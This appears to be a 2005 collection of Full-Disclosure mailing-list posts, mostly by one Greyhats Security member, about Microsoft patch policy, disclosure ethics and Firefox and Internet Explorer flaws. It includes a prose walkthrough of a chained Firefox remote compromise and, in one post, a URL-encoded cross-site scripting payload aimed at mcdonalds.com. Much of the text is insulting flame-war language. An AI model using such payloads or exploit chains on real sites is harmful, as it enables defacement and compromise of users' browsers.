Re: [Full-disclosure] Re: MS not telling enough
I respect your right to have an opinion, however I do not respect the fact that your opinion completely sucks ass. I meen seriously man, when has MS really become that bad? So much more people run Windows than who run Linux and you know it's true, and it's never going to change. There is not a god damn thing you nor anybody else on this list can do about it. I know I will be shunned for saying this, but who cares what people think if all they do is waste their time trying to something as stupid asbring down Microsoft? As for your statement that Microsoft purposefully harms others, that isa completely ignorant thing to say, and you are downright stupid for saying it. If it is the customers that you are talking about, then I am not going to even bother to argue with you because that would be the dumbest thing that I have heard in my life. However, if by "others" you meen the open source community, then you, sir, have no idea of the concept known as "capitalism". It's this great thing where you actually get paid for what you spend your time doing! Wow! Microsoft practices capitalism, and is, quite frankly, very good at it. Sure you can go around shouting, "Down with Microsoft, down with Microsoft!" but have you ever stopped to think, "Why do I hate Microsoft? Have they done anything wrong? Or am I just blowing smoke?" Give me one SPECIFIC example,Mr. Coombs,of why you personally have something against Microsoft, and I will get off your back. However, it is my personal opinion that you are just conforming to the mindset of the rest of the anti-MS fanatics. I am sick and tired of the stupidity that crowds this earth. Regards,PaulGreyhats Securityhttp://greyhatsecurity.orgLet the flame wars begin!-- Original message from "Jason Coombs" [EMAIL PROTECTED]: -- So there ya go. I suppose you'll find something new to complain about, or to be rude about. Whenever possible, yes. It's amazing how much you support Microsoft. Don't you know that it is in the continued support that you give them that they derive their continued opportunities to harm others? Of course, the more you and others support Microsoft, the more your expertise grows in value. Compare your decision-making and ethics to the decisions made by me and others who, after hard work and sacrifice to gain over a decade worth of training, education, skill and work experience with Microsoft products, grew to understand that it causes harm to the entire world for us to apply that skill in any fashion that helps Microsoft. I swore an oath never again to apply my skills in a way that helps Microsoft. ... or to help any other organization that knowingly causes harm with reckless disregard for the well-being of others. Integrity, competency, and those who prove they are good people must be supported, and anyone who lacks integrity, competency, and has proven they are bad must be opposed. To do otherwise demonstrates the same self-serving and wrong thinking that enables Microsoft to con its victims in the first place. Glad to see Microsoft give an opinion that more clearly explains that their Windows 2000 product is inherently defective and shouldn't be used if you intend to connect it to a c omputer network. That was the conclusion that I arrived at after performing a forensic review of IIS 5.0 -- you'll find my analysis contained within my book about IIS security: http://www.science.org/jcoombs/ http://www.forensics.org/IIS_Security_and_Programming_Countermeasures.pdf Best, Jason Coombs [EMAIL PROTECTED]-Original Message- From: "Kurt Seifried" <[EMAIL PROTECTED]> Date: Thu, 18 Aug 2005 11:00:04 To:<[EMAIL PROTECTED]> Subject: MS not telling enough They just updated MS05-039. Windows 2000 systems are primarily at risk from this vulnerability. Windows 2000 customers who have installed the MS05-039 security update are not affected by this vulnerability. If an administrator has disabled anonymous connections by changing t he default setting of the RestrictAnonymous registry key to a value of 2, Windows 2000 systems would not be vulnerable remotely from anonymous users. However, because of a large application compatibility risk, we do not recommend customers enable this setting in production environments without first extensively testing the setting in their environment. For more information, search for RestrictAnonymous at the Microsoft Help and Support Web site. So there ya go. I suppose you'll find something new to complain about, or to be rude about. -Kurt ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia -
Re: [Full-disclosure] The best 0-day exploit source
Hey, I know some 0-days! However, they took a while to find, so what are you gonna give me for them, mr Ahmad? A guarantee that I will be visiting a website one day and be infected by a virus that you wrote with my exploit? No thanks, I have better plans for my hard work. How about youstop spamming this already noobish list and try something you might be better at (like serving me fries at mcdonalds). Thanks Paul Greyhats Security http://greyhatsecurity.org -- Original message from Daniel [EMAIL PROTECTED]: -- Is it me or has anyone else noticed that the overall skill factor for people "doing security" has diminished to such a low level that one shudders at the thought? Ahmad, try these (and yes your gonna pay for them unless you code your own) http://archives.neohapsis.com/archives/fulldisclosure/2005-07/0583.html Dave Aitel's CANVAS http://www.immunitysec.com/products-canvas.shtml but here is a hint... 0hdayz are kinda sekrit and not publically available, no matter what you read in book title here On 8/10/05, Ahmad N <[EMAIL PROTECTED]>wrote: Hi there, I'm looking for the best 0-day ex ploit source, a source I can really count on for the newest and most reliable exploits. can anybody suggest a website??? Thx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compromising pictures of Microsoft Internet Explorer!
I do not meen to flame you, but you are an irresponsible disgrace to the hacking community. Do you not care about the customer? You never publicly disclose details to a vulnerability of this magnitude. This is an image vulnerability, for crying out loud. What's the first thing they tell you to do when most vulnerability details are released? Disable active scripting. That doesn't work here. What are the innocent, ignorant computer users going to do? Disable images? I think not. You should be ashamed. I firmly believe that you are decieving us when you say you had a hard time with [EMAIL PROTECTED]; in fact, I don't even think that you have ever once in your life reported a vulnerability to them responsibly. Otherwise, you would not have such harsh feelings about them. If the evil of the stereotypical Microsoft machine exists anywhere on the campus in Redmond, it will not be found in the building of MSRC, which is where your [EMAIL PROTECTED] emails are directed. Come on man. I know you have talent. You are a good researcher of computer security. But if your talent is going to be wastedlike this, you are nothing more to us than a script kiddie. Regards, Paul Greyhats Security http://greyhatsecurity.org -- Original message from Michal Zalewski [EMAIL PROTECTED]: -- Synopsis: - Well, not really. Instead, at the risk of boring you to death, I'd like to report on a casual 30-minute experiment I've conducted of recent. This experiment resulted in identifying a potential remote code execution path in Microsoft Internet Explorer, plus some other bugs, and should be a good starting point for further testing of other browsers or similar programs. Discussion: --- You might remember the 'mangleme' affair, where various browsers were subjected by yours truly to a trivially constructed malformed HTML crash-course - all that in order to find exploitable input handling flaws. Back then, MSIE pe rformed admirably compared to other browsers (although did not escape some embarassment when [EMAIL PROTECTED] found the infamous IFRAME bug that way): http://lcamtuf.coredump.cx/mangleme/gallery/ Of recent, I decided to try something completely different and radically new, without having to do any actual work. I used the same META REFRESH auto-test framework to check for image decompression and parsing flaws (JPEG, GIF, PNG), as opposed to making fun of HTML renderers. I used a simple index.cgi script (attached, though hardly noteworthy) to dynamically generate a page that references ten just as dynamically created images. These images were prepared by running a test set of pictures (some regular ones, and several pathological cases created with ImageMagick) through a slightly modified version of my old afx utility. Surprisi ngly, it is MSIE and its proprietary JPEG decoder (apparently not shared with other Windows components?) that performed embarassingly poor this time. Results below. Vulnerability examples: --- NOTE #1: As with mangleme, this list of problems is most certainly NOT exhaustive, and performing longer tests or improving the technique would most likely result in additional findings. Several MSIE crash sample files from that 30-minute run are available at: http://lcamtuf.coredump.cx/crash/ Note that these may produce different results depending on program versions, plugins and configuration. Tested with WinXP Pro PL 2600.xpsp2.050301-1526 SP1, MSIE PL 6.0.2800.1106, up-to-date. mov_fencepost.jpg - on most platforms, causes a crash due to mov destination fencepost error after g oing past allocated memory, or after accessing a bogus address such as 0x27272727. The destination address appears to be controllable (i.e. changing the file or displaying other data before or along with this image alters it). My bets are that this is exploitable for remote execution. cmp_fencepost.jpg - here, causes a crash due to a very similar cmp fencepost (no write). Not necessarily exploitable for remote code execution, unless code execution path can be affected later on. oom_dos.jpg - usually causes a OOM crash. Less interesting, unless you like to punish people who borrow your pictures for their blogs. random.jpg - causes mov fencepost of CPU consumption + crash. Didn't investigate in much detail. NOTE #2: MSIE comes with no sources, and reverse engineering is naughty. I didn't examine the renderer to see what went w rong; I see unbounded, user-dependent memory accesses, and that spells trouble. Vendor notification: It is my experience that reporting and discussing security problems with Microsoft is a needlessly lengthy process that puts too much burden and effort on the researcher's end, especially if you just have a crash case, not a working exploit; hence, they did not get an advance notice. Bonus (OT) -- Since piggyback request smuggling and
Re: [Full-disclosure] ICMP Security Vulnerabilities - NEW (cough)
Well-written and easy to follow. Good job. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Benign Worms
-- Original message from "Eric Paynter" [EMAIL PROTECTED]: -- On Fri, May 13, 2005 3:49 pm, Benjamin Franz said: There are a many laws that turn on facts rather than intent. "Lack of criminal intent does not shield a citizen from the BATF. In United States v. Thomas, the defendant found a 16- inch-long gun while horseback riding. Taking it to be an antique pistol, he pawned it. But it turned out to be short-barreled rifle, which should have been registered before selling. Although the prosecutor conceded that Thomas lacked criminal intent, he was convicted of a felony anyway.[64] The Supreme Court's decision in United States v. Freed declared that criminal intent was not necessary for a conviction of violation of the Gun Control Act of 1968.[65]" David Kopel, in "Trust The People: The Case Against Gun Control" I think we're getting a little into an argument of semantics. The defendant did in fact *intend* to sell the weapon, which was against the law to do. He just wasn't aware of the law. Ignorance of the law does not protect you. Try these two scenarios out: 1. I kill somebody with the intent to kill, and then I claim I didn't know killing was illegal. Most courts would still say murder. 2. I kill somebody because they are attacking me with a lethal weapon. I know killing is illegal, but my intent is not to kill the other person, but rather to save myself, and the only way to save myself is to use lethal force. If I can *prove* my intent was to save myself, then it is not murder. Ba ck to the original argument, if the intent is to patch PCs for which I have the authority to patch, then I'm not doing anything illegal, no matter what kind of software I create to do it. Even if the worm that I create somehow gets out, but I can *prove* my intent was for it to not get out, then even though releasing a worm is illegal, the worst I might get is criminal negligence for not taking the proper precautions. Anyhow, I think we all agree that writing a worm to do patch management is generally a bad idea. -Eric -- arctic bears - email and dns services http://www.arcticbears.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox 1.0.4 released. Several critical vulnerabilities fixed
Well, it's official. Mozilla Firefox has been updated and can be downloaded from www.getfirefox.com. Many security vulnerabilities have been fixed in this version. Advisories will be made public soon... Regards, Paul Greyhats Security http://greyhatsecurity.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox Remote Compromise Technical Details
Firefox Remote Compromise Technical Details Before I start, I need to say that this thing has been patched on Mozilla's server. If you take a look at any of the extension install pages on their site, you will see that the install function has a bunch of random letters and numbers after it. Even though this would probably be an easy thing to bypass, I am not going to attempt it because of the uselessness of such a bypass. A patch is already in development and so any more work going into fine-tuning this exploit would be a waist of time. There are three core vulnerabilities being used in my example. A friend of mine (Michael Krax, http://www.mikx.de) helped me with the research. To understand why the example works, one must understand the basics of how Firefox works. Everything you see in firefox is essentially a webpage being rendered by a compiler. This is what the gui is made of, and this is why firefox is so easy to customize. However, it also allows for some security bugs. If one could get one of the chrome pages to request a javascript:[script] url, that individual would be given complete access to the system because chrome urls are given full rights in firefox. My example works by tricking the addon install function into displaying an icon with a javascript url. However, this would not be enough to compromise the system. By default, the install feature only works when called from a page within update.mozilla.org or addon.mozilla.org. Therefore, another (cross site scripting) vulnerability had to be found to call the install feature from mozilla.org. This vulnerability navigates to a javascript page and displays a link (pointing to a mozilla.org page) within a frame that follows the user's cursor. After the user clicks, the link is navigated to, which fires the onload event. This is a buggy event in Firefox because with it we can now access certain parts of the window object that we shouldnt, such as the history object. After the page loads, we use the history object to navigate backwards to the javascript page. The javascript is executed again, now from update.mozilla.org because when we navigated backwards, we essentially navigated to a javascript:[script] page. Now we call the install addon feature, which displays a dialog with det ails of the requested addon, including an image with a specified image. This image points to a javascript:[script] url, which gets executed in the context of chrome. Now we have compromised the system :) Whew, that was quite a mouthful. I am still trying to gather all the details as to how my research was leaked, but recent conversations are leading me to believe that it was a misplacement of trust, not a server compromise. However, I do not want to jump to conclusions too quickly, as this will only lead to more problems. That's all I will say about that subject, as I don't want to offend anybody. Also, I would like to let everyone know that this is not the only vulnerability that Mikx and I have found. We still have a couple of tricks up our sleeves, and you can be sure that we will not make the same mistake twice. If you want to see the original PoC, here is the url: http://greyhatsecurity.org/vulntests/ffrc.htm Paul Greyhats Security http://greyhatsecurity.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox Remote Compromise Leaked
Well, apparently one of my Firefox vulnerabilities has been leaked. Mikx and I have been working on Firefox security for some time and we are trying to put together something spectacular, but unfortunatly there are always those people out there that feel they need to ruin it for people. About a week ago, Mikx and I put together a nice remote compromise for Firefox, submitted it to bugzilla, and got a bug number for it. This is the message that I just got from Bugzilla: [EMAIL PROTECTED] to me 12:14 am (1 hour ago)https://bugzilla.mozilla.org/show_bug.cgi?id=292691 [EMAIL PROTECTED] changed: What |Removed |Added CC| |[EMAIL PROTECTED], | |[EMAIL PROTECTED], p; | |[EMAIL PROTECTED], | |[EMAIL PROTECTED], | |[EMAIL PROTECTED] --- Additional Comments From [EMAIL PROTECTED] 2005-05-07 21:14 PDT ---So now someone is claiming a 0day that looks a lot like this. See bug 293302. So apparently, the secret is out. I wish that this could have been used for good purposes but I guess that just isn't possible these days... Here is the original PoC:http://greyhatsecurity.org/vulntests/ffrc.htm I suspect that my server was compromised, and I am currently using my contacts to find the culprit and bring him to justice. Sorry to Mozilla, Mikx, and everyone else that was harmed by the inconsiderate, irresponsible actions of an individual. Regards,Paul ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Micky-dee's anyone?
To all you people that like McDonalds, here is a quick link that may show you the light: http://www.mcdonalds.com/app_controller.bumper.bumper.html?_continue=%29%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%62%61%63%6B%67%72%6F%75%6E%64%3D%22%77%68%69%74%65%22%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%62%3E%3C%63%65%6E%74%65%72%3E%3C%62%72%3E%3C%62%72%3E%44%6F%6E%74%20%65%61%74%20%4D%63%44%6F%6E%61%6C%64%73%20%79%6F%75%20%66%61%74%20%66%75%63%6B%21%27%29%22%29%3B%3C%2 F%73%63%72%69%70%74%3E Interesting, huh? Regards, Pauil ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [INetCop Security Advisory] Snmppd potentially format string vulnerability.
BR BR Japan MUST apologize what they have done to all Asian countries during WW2. BR Eduation is to teach TRUE history to their child. BR BR History is one thing that CAN NOT be changed. BR Japan should follow German model. BR BR Germany is also a defeated nation, but they feel deeply sorry for what BR they have done and they teaches the REAL history. BR BR The history goese on. BR BR BR P.S: Sorry, for my poor english. BR This is a hackers mailing list... Not a politicians one. Please keep politics talk somewhere else; I get enough of that propoganda crap from the news each night. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer OverflowExploit(was broken)
On Wed, Apr 20, 2005 at 05:35:56PM -0700, Day Jay wrote: Get your wrap-around text fixed you fucking fed!! I'm fed up with you!! Jeezsus, expose yourself as such. hehehe dumfux I guess there's something to be said for moderated lists, eh? I don't think that FD is moderated. I believe you're thinking of bugtraq. Day Jay sounds like a real asshat, eh Steve? Paul Greyhats Security Group http://greyhatsecurity.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to Report a Security VulnerabilitytoMicrosoft
[EMAIL PROTECTED] wrote: But think about it, the testing scenarios that exist on planet earth can not possibly be even accounted for let alone tested in Redmond. Point made; large install base requires more testing. But like most things this does not apply to every patch/root-fix. It seems they take their time on the simple fixs too most times. -- dk Often times, the simplest of fixes tend to create the most complex architectural problems. Microsoft doesn't focus all their effort on pen-testing their patches, they spend their time mostly on ensuring that 3rd party software is not broken by their patches. That's why the simplest of fixes aren't as simple as they may seem. You only see the solution; Microsoft must dig through several solutions before they find the right one. Paul Greyhats Security http://greyhatsecurity.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to Report a Security Vulnerability to Microsoft
hahahahahaha m$ doing social engineering on fd, this is a joke. basically they want your 0days so billg becomes more rich. Mr. Guninski, although I am a huge fan of your work, I could not disagree more. I am sending this email from Redmond where I was invited by Microsoft to a small conference about security (it was mostly about what they go through when stuff is reported). "M$", as you call it, is not trying to get your 0days. They simply want to protect customers, and, although a large part about it is profits, the concern is mostly (as far as I know) about the users.Microsoft's biggest fear is wide-spread virus epidemics, so when a critical vulnerability isfully disclosedwithout prior notice to MSRC,Microsoft goes intoan emergency state and everyonegets off of vacation early to come in and help resolve the issue (as was the case withmyauto-sp2rc release in December,also called"Paul's Christmas" by MSRC employees).Microsoft knows that security researchers hang out on lists like fd a bugtraq, so what better place to eliminate t he common improper disclosing ignorance than to provide clear, concise instructions directly on the security hotspots? Regards, Paul Greyhats Security http://greyhatsecurity.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to Report a Security Vulnerability toMicrosoft
this is basicly the same response I had from my OWA advisory ... VI. VENDOR RESPONSE Microsoft has reviewed the issue and has made the determination that while a bug fix may be implemented in a future service pack, a security advisory/patch will not be released for this issue therefore, in the interest of everones security, iDefense released the advisory ( as did I ) without a patch being released first. it is quite possible they ( Microsoft ) are trying to make out like they were'nt contacted before said advisory was released but that is just my opinion on observation. my 2 bits, Donnie Werner That response was given to me when I reported a DoS vulnerability for Internet Explorer (which, might I add, required user interaction). It simply meens that the reported vuln, on a severity scale of 1-10, would pretty much be given a 1. If I'm not mistaken, your OWA vulnerability just spoofs the From address. Although some forms of social engineering MIGHT be possible, there is ultimately no use for something this minor. Think for a second about how much time and resources, including human labor required to produce the patch as well as the technology department employees that must install patches on every computer in large corperations, goes into making a patch. First of all, there's the whole problem with does the solution break 3rd party software. Also theres a problem with cross-platform software (they do have stuff for Mac you know). Another thing they have to worry about is how much money and resources it costs companies other than Microsoft to apply the patches. When c ommon people start seeing a lot of patches, they start losing faith in the software, which is bad for Microsoft. Therefore, the bad outweighs the good when determining whether to provide a patch for something as insignificant as your OWA advisory. I am not saying that I don't respect your efforts. I am just trying to get accross the message that Microsoft is not out to get us. Everyone thinks of them as this big evil monopolistic empire, but they're not. By the way, has anyone read Writing Secure Code by some of the guys from Microsoft? It's pretty interesting, and it offers some insight as to what are considered critical vulnerabilities and what are considered vulnerabilities with little or no severity. Believe me when I tell you (as I have had 1 on 1 conversations with many security vip's at Microsoft Campus) that Microsoft is doing everything that they can to ensure you a safe, enjoyable experience while using their software. Btw, Mr. Werner, you seem to be among the common group of anti-Microsoft individuals. May I ask what the vendor of your operating system is? What about your browser? Maybe even your word processor or html editor? Uh-huh, that's what I though. Regards, Paul Greyhats Security http://greyhatsecurity.org P.S. I do NOT work for Microsoft. I was merely invited to visit their campus and meet some of their people. Very nice bunch of folks they are. We went out to dinner on a couple occasions and had a good time. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to Report a Security Vulnerability to Microsoft
Dumb question... since this is openly admitted as for profit you are posting this... what are you paying for exploits ? We all know others pay for them. Your awkward phrasing confuses me. I am not making any profit off of security research. I do not buy vulnerabilities either, nor do I work for Microsoft. My security research is purely a hobby. Regards, Paul Greyhats Security http://greyhatsecurity.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/